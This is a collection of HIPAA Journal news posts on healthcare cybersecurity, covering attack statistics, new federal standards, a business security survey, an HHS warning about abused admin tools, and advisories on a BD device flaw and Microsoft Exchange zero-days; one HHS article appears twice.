Check Point’s 2022 Mid-Year Report has revealed the healthcare industry has seen the biggest percentage rise in cyberattacks out of all industry sectors, increasing by 69% in 1H 2022, compared to 2021.  Healthcare now ranks fifth highest in the number of weekly attacks, behind education, government/military, ISP/MSP, and communications.

Check Point explains in the report that 2022 has demonstrated that cyberattacks have become firmly entrenched as a state-level weapon, with the first half of the year seeing an unprecedented increase in state-sponsored attacks due to the ongoing war in Ukraine, along with a major increase in hacktivism – the recruitment of private citizens for an ‘IT Army’ for conducting attacks. Check Point says the fallout from this is likely to be felt by governments and enterprises worldwide.

The ability of cyberattacks to affect everyday lives has become crystal clear. 2022 has seen attacks conducted on TV stations that have stopped broadcasting, while attacks on critical infrastructure and government departments have crippled essential services. Many of these attacks have been conducted in Ukraine, but this is a worldwide problem. The attack on Costa Rica crippled services across the country, including healthcare, and it was not an isolated incident, with a similar attack hitting Peru shortly after. Cyberattacks that have a country-wide impact may become more common. In education, the ransomware attack on Lincoln College forced it to close its doors after 157 years, and numerous ransomware attacks on healthcare providers have caused major disruption to healthcare services.

There has been a step up from cybercriminal organizations conducting attacks for financial gain on individual organizations to them acting like nation-state-level threat actors. The Conti ransomware operation, in response to the decision of Costa Rica not to pay the ransom, sought to overthrow the government by encouraging citizens to revolt. Some cybercriminals groups now consist of hundreds of individuals and have revenues of hundreds of millions or even billions of dollars. In some cases, these groups function like genuine businesses, with some even paying for physical office space, and operating at that scale becomes difficult without at least some backing from governments in the countries where they are based. There has also been a trend that has seen cybercriminals dispense with ransomware altogether, and instead, they are opting for plain extortion – stealing data and demanding a ransom for its return, as is the modus operandi of the Lapsus$, RansomHouse, and Karakurt threat groups.

Check Point’s data shows there has been a 42% increase in cyberattacks globally in the first half of 2022, with all regions experiencing a significant escalation in cyberattacks. Globally, 23% of corporate networks have been attacked with multipurpose malware, 15% have seen attacks using cryptominers, 13% have had infostealer infections, 12% have experienced mobile attacks, and 8% have suffered ransomware attacks. Healthcare is one of the most attacked sectors, with attacks increasing by 69% to an average of 1,387 attacks on organizations every week.

In the Americas, Emotet has regained its position as the most common malware threat following its takedown by law enforcement in January 2021 which brought attacks to a grinding halt. Emotet has been used in 8.6% of malware attacks in 1H, 2022, with a wide range of malware variants now being used, with Formbook (4.2%), Remcos (2.3%), and XMRig (1.9%) the next most common.

High-profile vulnerabilities continue to be exploited to gain access to corporate networks, with the Atlassian Confluence RCE vulnerability (CVE-2022-26134), Apache Log4j RCE vulnerability (CVE-2021-44228), F5 BIG IP RCE vulnerability (CVE-2022-1388) the most commonly exploited.

Check Point has made predictions for the rest of the year based on attack trends identified in 1H 2022. Ransomware is expected to become a much more fragmented ecosystem, the disabling of macros is likely to see more diverse email infection chains employed, hacktivism is expected to continue to evolve, and attacks on the blockchain and crypto platforms are expected to increase.

The advice of Check Point to improve defenses is to install updates and patches regularly, adopt a prevention-first strategy and approach, install anti-ransomware solutions, improve education about cyber threats, collaborate with law enforcement and national cyber authorities, and prepare for the worst by implementing and testing incident response plans that can be immediately actioned in the event of a successful attack.

The post Mid-Year Report Shows Healthcare Cyberattacks Have Increased by 69% appeared first on HIPAA Journal.

The U.S. government is taking steps to improve critical infrastructure cybersecurity, with healthcare, water, and the communications sectors the next focus areas for the White House. The White House is planning to issue new guidance and cybersecurity standards for these industries to improve resilience against malicious cyber actors, whose attacks are increasing in both frequency and sophistication.

Anne Neuberger, deputy national security advisor for cyber and emerging technology, outlined some of the key areas of focus for the White House in a recent Washington Post Live event. These steps are in line with the Biden administration’s May 2021 executive order (EO 14028) that sought to improve cybersecurity for critical infrastructure and federal information systems through public-private partnerships. A great deal of the critical infrastructure in the United States is controlled by private companies, and while there are regulations that require minimum security standards to be implemented in certain sectors, more needs to be done to ensure that standards apply to all critical infrastructure and they improving resilience.

Neuberger explained that the cybersecurity of critical infrastructure in the United States lags behind other Western countries, stating the U.S. is “pretty much last in the race” when it comes to ensuring minimum cybersecurity standards are set for critical infrastructure organizations. Neuberger said one advantage of this is the U.S. will be able to learn from its many peers.

Cyberattacks on critical infrastructure have been increasing, especially ransomware attacks, many of which have hit the healthcare sector. Those attacks often have a major impact on the ability of healthcare organizations to operate. One recent Trend Micro survey indicates 25% of healthcare organizations were forced to completely halt operations following a ransomware attack, with 60% saying the attacks caused some disruption to business processes. Those attacks naturally have an impact on public safety, with some studies (Proofpoint, Censinet, Health Services Research) suggesting patient mortality increases following ransomware or other major cyberattacks.

Other major ransomware attacks on critical infrastructure include the attack on Colonial Pipeline, which disrupted fuel supplies to the Eastern Seaboard, and the attack on JBS, which disrupted food processing. Those attacks demonstrated a lack of preparedness and were a major wake-up call, clearly demonstrating cybersecurity needs to be significantly improved for all critical infrastructure and for standards to be implemented to lessen the impact of attacks should they succeed.

The bipartisan Securing Systemically Important Critical Infrastructure (SICI) Act will play a key part in the process of improving cybersecurity for all critical infrastructure. The legislation seeks to establish a transparent, stakeholder-driven process to designate systemically important critical infrastructure (SICI). The legislation requires the Director of the Cybersecurity and Infrastructure Security Agency (CISA) to establish a methodology and criteria for determining what critical infrastructure qualifies as SICI, to prioritize meaningful benefits to SICI owners and operators without any additional burden, and calls for CISA to provide SICI owners and operators with the option to take part in prioritized cybersecurity services. Currently, the government is not fully aware of exactly what SICI is and where security needs to be improved.

President Biden has also signed the Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) into law, which requires CISA to develop and implement regulations requiring covered entities to report cyber incidents and ransomware payments. Reporting will allow CISA to rapidly deploy resources and render assistance to victims suffering from attacks. It will also allow the agency to rapidly identify cyber threat trends, and quickly share relevant, actionable information with network defenders to warn other potential victims.

Healthcare is one of the main focus areas for the White House, and efforts to improve cybersecurity across the sector are underway. Neuberger confirmed that the Department of Health and Human Services has been working with partners at hospitals and has been developing minimum cybersecurity guidelines and will be working on developing new standards and guidance for securing medical devices and other broader areas of healthcare in the near future.

The post White House Plans to Issue New Cybersecurity Standards for the Healthcare Industry appeared first on HIPAA Journal.

Businesses are appreciating the importance of cybersecurity and realizing that they need to invest more heavily in cybersecurity as threats are evolving at such a rapid pace. The challenge for businesses is ensuring that their defenses allow them to stay one step ahead of cybercriminals, but the frequency at which data breaches are being reported suggests many businesses are struggling to keep up the pace.

In order to understand how to keep their businesses secure, IT leaders need to know how cybercriminals are bypassing defenses. They can then make informed decisions about the security solutions they need to invest in that will give them the best ROI in terms of security.

Keeper Security recently conducted a survey to explore how cybersecurity is transforming and where businesses are investing in cybersecurity tools. The survey was conducted on 516 IT decision-makers in the United States and the findings were published in Keeper’s 2022 U.S. Cybersecurity Census Report. The report delves into the threats that businesses face and the strategies that can be adopted by businesses to better deal with cyber threats and stay one step ahead of the threat actors that are trying to breach their networks.

Businesses realize that cybersecurity is a key priority. 71% of businesses said they have made new hires in cybersecurity in the past 12 months, but even with additional skilled staff, there is concern among businesses that they will not be able to maintain pace with the fast-evolving cyber threat landscape.

According to the study, U.S. business experiences an average of 42 cyberattacks a year and IT leaders predict that attacks will increase in the next 12 months. A majority of respondents said they were confident in their ability to defend against cyber threats and that they believe they have the cybersecurity solutions and tools in place to protect against attacks, even though an overwhelming majority of surveyed organizations experienced a successful cyberattack in the past year. IT leaders also report that it is now taking longer to identify and respond to cyberattacks.

The survey confirmed the impact cyberattacks are having on businesses. 31% of businesses said they had experienced a successful cyberattack that had disrupted partner/customer operations, with the same percentage saying attacks resulted in the theft of financial information. 28% said attacks caused reputational damage, with the same percentage saying corporate information was stolen. Almost a quarter said attacks resulted in disruption of the supply chain and trading/business operations. These attacks are having a considerable financial impact on businesses. On average, successful attacks cost businesses $75,000 per incident, with almost 4 in 10 organizations saying attacks have cost more than $100,000 to resolve.

While there was a high degree of confidence in cybersecurity defenses, the survey revealed the technology being used to defend against attacks was missing essential tools. Almost one-third of businesses did not have a management platform for IT secrets, such as API keys, database passwords, and privileged credentials. 84% of respondents were concerned about hard-coded credentials in source code, yet 25% of businesses did not have any software in place to remove them.

58% of Americans now spend at least some of the week working remotely, yet more than a quarter of businesses said they do not have a remote connection management solution in place to allow their IT infrastructure to be accessed securely by remote workers.

Identity and access management vulnerabilities were also identified. Only 44% of businesses said they provide their employees with best practices governing passwords and access management, and three out of 10 businesses let their employees set and manage their own passwords and admitted employees frequently share access to passwords. Only 26% of businesses said they have a highly sophisticated framework in place for visibility and control of identity security.

“This laissez-faire approach to access management makes it clear that more must be done to keep organizations and their employees protected,” explained Keeper Security in the report. “Despite these issues presenting a clear threat to businesses, fewer than half of respondents state they have plans to invest in password management, visibility tools for network-based threats, or infrastructure secrets management.”

The main areas where businesses plan to invest in security in the next 12 months are security awareness training (54%), creating a culture of compliance (50%), password management (48%), improving visibility to detect network threats (44%), infrastructure secrets management (42%), and passwordless authentication (42%). Despite its importance, only 32% of businesses said they are planning to adopt a zero-trust and zero-knowledge approach to security.

While it is encouraging to see many businesses making cybersecurity a key priority, the survey revealed a lack of transparency about cyberattacks at many businesses. 48% of IT leaders said they were aware of a cyberattack and kept it to themselves. “For U.S. businesses to become truly secure, perhaps the biggest change that must be made is cultural,” explained Keeper Security in the report. “Nearly half of IT leaders admitted to keeping a cyberattack they were aware of to themselves (suggesting they did not report it to any relevant authority). This figure should shock business leaders. Without a culture of trust, accountability, and responsiveness, cybercriminals will thrive.”

The post Study Suggests Businesses Are Not Prepared for the Escalation in Cyberattacks appeared first on HIPAA Journal.

It has become increasingly common for threat actors to use living-off-the-land techniques for conducting reconnaissance, privilege escalation, persistence, and moving laterally within networks undetected. The same software and security tools used by network administrators and red team professionals for legitimate purposes are abused and used to conduct attacks on victims’ infrastructure.

Threat actors leverage software tools that have already been installed to avoid having to download files via the Internet, malicious activities can be hidden within the logs along site legitimate use of these tools, and these tools are used to conduct malicious activities in the memory to evade security solutions. Traditional approaches to security such as blocking hashes of malicious files and malicious domains are ineffective against these tools, as they are already installed on the network.

Recently, the Health Sector Cybersecurity Coordination Center (HC3) issued a white paper warning the healthcare and public health sector (HPH) about these living-off-the-land techniques to raise awareness of the threat and explain the risks of using certain tools. The tools most commonly abused by malicious actors include the penetration testing and adversary simulation frameworks Cobalt Strike and Brute Ratel; Microsoft’s cross-platform automation tool, PowerShell; the credential dumping application, Mimikatz; the Windows troubleshooting application, Sysinternals; and the remote desktop application, Anydesk.

These and other tools have been extensively used by nation-state hackers and cybercriminals in attacks on a wide range of sectors, including healthcare, and mitigating against these tools can be a significant challenge. These tools all have legitimate uses and are often deployed on common systems, but the malicious use of these tools can be difficult to detect.

Cobalt Strike, for instance, has been extensively abused by threat actors for the past 5 years. More than 8,000 attacks have been conducted that leveraged this comprehensive red team framework. The tool is commonly used by penetration testers to assess risks and vulnerabilities and simulate attacks, but the extensive capabilities of the framework are ripe for abuse. Cobalt Strike can be used as a highly customizable spear phishing tool, for discovering client-side applications, conducting exploitation/post-exploitation activities, data transfers, real-time communications, and for command and control of compromised systems. Brute Ratel is a newer and less well-known framework that has many of the same capabilities. Both of these tools are extensively used by ransomware gangs and nation-state threat actors, including in attacks on the healthcare sector.

PowerShell is a command shell and scripting language that is extensively used by IT teams for automation and configuration management, and defending against misuse can be a particular challenge. It is often not possible to block the use of the tool due to the value it provides, but if the tool is not commonly used, it should be disabled through group or security policies.

AnyDesk is a remote access solution that is used to access several operating systems for providing remote IT support. AnyDesk is also commonly used for file transfers and virtual private network services. Connections are encrypted to protect against data interception, but that also makes it harder to detect malicious use. AnyDesk has been extensively used by ransomware actors, including AvosLocker and Babuk, and BazarLoader uses AnyDesk to deploy ransomware payloads.

HC3 says the Department of Health and Human Services neither endorses nor condemns the use of these tools but recommends entities in the HPH sector should carefully evaluate these tools and assess the risks and rewards, and determine whether the value provided outweighs the risks.

In the white paper, HC3 provides a detailed explanation of each of these tools, their legitimate uses, how they are abused by threat actors, and steps that can be taken to prevent and detect malicious use.

The post HHS Warns HPH Sector About Abuse of Legitimate Software and Security Tools by Threat Actors appeared first on HIPAA Journal.

It has become increasingly common for threat actors to use living-off-the-land techniques for conducting reconnaissance, privilege escalation, persistence, and moving laterally within networks undetected. The same software and security tools used by network administrators and red team professionals for legitimate purposes are abused and used to conduct attacks on victims’ infrastructure.

Threat actors leverage software tools that have already been installed to avoid having to download files via the Internet, malicious activities can be hidden within the logs along site legitimate use of these tools, and these tools are used to conduct malicious activities in the memory to evade security solutions. Traditional approaches to security such as blocking hashes of malicious files and malicious domains are ineffective against these tools, as they are already installed on the network.

Recently, the Health Sector Cybersecurity Coordination Center (HC3) issued a white paper warning the healthcare and public health sector (HPH) about these living-off-the-land techniques to raise awareness of the threat and explain the risks of using certain tools. The tools most commonly abused by malicious actors include the penetration testing and adversary simulation frameworks Cobalt Strike and Brute Ratel; Microsoft’s cross-platform automation tool, PowerShell; the credential dumping application, Mimikatz; the Windows troubleshooting application, Sysinternals; and the remote desktop application, Anydesk.

These and other tools have been extensively used by nation-state hackers and cybercriminals in attacks on a wide range of sectors, including healthcare, and mitigating against these tools can be a significant challenge. These tools all have legitimate uses and are often deployed on common systems, but the malicious use of these tools can be difficult to detect.

Cobalt Strike, for instance, has been extensively abused by threat actors for the past 5 years. More than 8,000 attacks have been conducted that leveraged this comprehensive red team framework. The tool is commonly used by penetration testers to assess risks and vulnerabilities and simulate attacks, but the extensive capabilities of the framework are ripe for abuse. Cobalt Strike can be used as a highly customizable spear phishing tool, for discovering client-side applications, conducting exploitation/post-exploitation activities, data transfers, real-time communications, and for command and control of compromised systems. Brute Ratel is a newer and less well-known framework that has many of the same capabilities. Both of these tools are extensively used by ransomware gangs and nation-state threat actors, including in attacks on the healthcare sector.

PowerShell is a command shell and scripting language that is extensively used by IT teams for automation and configuration management, and defending against misuse can be a particular challenge. It is often not possible to block the use of the tool due to the value it provides, but if the tool is not commonly used, it should be disabled through group or security policies.

AnyDesk is a remote access solution that is used to access several operating systems for providing remote IT support. AnyDesk is also commonly used for file transfers and virtual private network services. Connections are encrypted to protect against data interception, but that also makes it harder to detect malicious use. AnyDesk has been extensively used by ransomware actors, including AvosLocker and Babuk, and BazarLoader uses AnyDesk to deploy ransomware payloads.

HC3 says the Department of Health and Human Services neither endorses nor condemns the use of these tools but recommends entities in the HPH sector should carefully evaluate these tools and assess the risks and rewards, and determine whether the value provided outweighs the risks.

In the white paper, HC3 provides a detailed explanation of each of these tools, their legitimate uses, how they are abused by threat actors, and steps that can be taken to prevent and detect malicious use.

The post HHS Warns HPH Sector About Abuse of Legitimate Software and Security Tools by Threat Actors appeared first on HIPAA Journal.

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a medical advisory about a recently discovered vulnerability that affects the BD Totalys MultiProcessor, which is used by hospitals and labs for processing clinical tissue specimens.

The vulnerability is due to the use of hard-coded credentials, which could allow an attacker with access to a vulnerable Totalys MultiProcessor to access, modify, or delete sensitive data, including personally identifiable and protected health information.

The vulnerability cannot be exploited remotely. In order to exploit the flaw, a malicious actor would need physical access to the BD Totalys MultiProcessor or network access to the system. Any additional security controls would also need to be bypassed.

The vulnerability, tracked as CVE-2022-40263, affects all BD Totalys MultiProcessor versions including and prior to v1.70, and has been assigned a CVSS severity score of 6.6 out of 10 (medium severity).

The vulnerability was discovered by BD and was reported to CISA under its responsible disclosure policy. BD says the vulnerability is due to be remediated in the upcoming v1.71 software release, which is expected to be made available to users in Q4, 2022. In the meantime, BD has suggested mitigations to prevent exploitation of the vulnerability.

Users should ensure physical access controls are in place to ensure access to the BD Totalys MultiProcessor is restricted to authorized individuals. If the device must be networked, industry standard security policies and procedures should be followed.

At the time of issuing the alert, there have been no cases of exploitation of the flaw and there are no known exploits in the public domain.

The post Advisory Issued About BD Totalys MultiProcessor Vulnerability appeared first on HIPAA Journal.

Microsoft was warned that two zero-day vulnerabilities in Microsoft Exchange Server are being actively exploited in the wild and has shared mitigations ahead of the vulnerabilities being patched.

The two flaws are being chained together and are being exploited by a Chinese threat actor. The attacks have been limited so far, but the healthcare and public health sector in the United States could potentially be a target.

The flaws affect Microsoft Exchange Server 2013, 2016, and 2019. CVE-2022-41040 is a Server-Side Request Forgery (SSRF) vulnerability that can be exploited for initial access, after which the second vulnerability can be exploited – A Remote Code Execution vulnerability thacked as CVE-2022-41082. The second vulnerability can only be exploited if PowerShell is available to the attacker.

Microsoft has confirmed that the flaws cannot be exploited by an unauthenticated attacker. Both vulnerabilities require authenticated access to a vulnerable Microsoft Exchange Server to be exploited, such as if an attacker had valid stolen credentials. The first vulnerability has been assigned a CVSS severity score of 8.8 out of 10 and the second vulnerability has a CVSS score of 6.3. If the flaws are exploited, a threat actor could deploy a backdoor for persistent access. The attackers have deployed the China Chopper web shell for persistent access in some of the attacks, which suggests the flaws are being exploited by a state-sponsored Chinese hacking group.

Microsoft is it is working on patches for the flaws on an accelerated timeline and has shared mitigations that can be implemented by users of on-premises Microsoft Exchange Servers ahead of the patches being released. Microsoft said it has implemented detection rules for Microsoft Exchange Online and has mitigations in place to protect customers, so Exchange Online customers do not need to take any actions to prevent exploitation of the flaws.

Customers with on-premises Microsoft Exchange Servers can add a blocking rule to ‘IIS Manager -> Default Web Site -> URL Rewrite -> Actions’ which will block the known attack patterns, the details of which have been detailed in the Microsoft Security Response Center blog.

The post Zero Day Microsoft Exchange Server Vulnerabilities Being Actively Exploited appeared first on HIPAA Journal.